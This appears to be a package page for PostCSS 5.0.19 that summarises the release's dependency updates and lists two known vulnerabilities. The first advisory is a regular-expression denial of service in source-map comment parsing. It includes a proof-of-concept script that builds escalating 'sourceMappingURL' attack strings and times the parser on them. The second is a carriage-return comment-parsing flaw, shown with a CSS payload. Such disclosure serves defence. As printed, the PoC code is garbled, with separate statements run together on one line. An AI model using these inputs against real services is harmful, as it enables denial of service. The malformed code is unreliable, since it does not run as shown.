PostCSS version 5.0.19 is a minor release following 5.0.18 in the popular tool for transforming styles with JavaScript plugins. Both versions share the same core dependencies: js-base64, source-map, and supports-color, indicating stability in fundamental functionalities. The primary differences lie in the development dependencies, which are tools used for building, testing, and linting the library itself, rather than impacting the end-user directly.
Specifically, postcss-parser-tests was bumped from version 5.0.5 to 5.0.6, indicating potential fixes or enhancements in the parser testing suite. babel-core also received a minor upgrade, moving from version 6.5.2 to 6.6.0, and there was a minor version update to babel-preset-es2015 going from 6.5.0 to 6.6.0; these Babel updates likely incorporate improvements in ES2015 transpilation. While these changes don't drastically alter PostCSS's functionality, they reflect ongoing efforts to refine the development process and maintain compatibility with the latest JavaScript standards. For developers using PostCSS, upgrading to 5.0.19 offers the assurance of benefiting from potential bug fixes and enhanced compatibility within the development environment, resulting in a slightly more robust and up-to-date build process for the PostCSS library itself. The MIT license ensures developers can use and modify PostCSS freely.
All the vulnerabilities related to the version 5.0.19 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.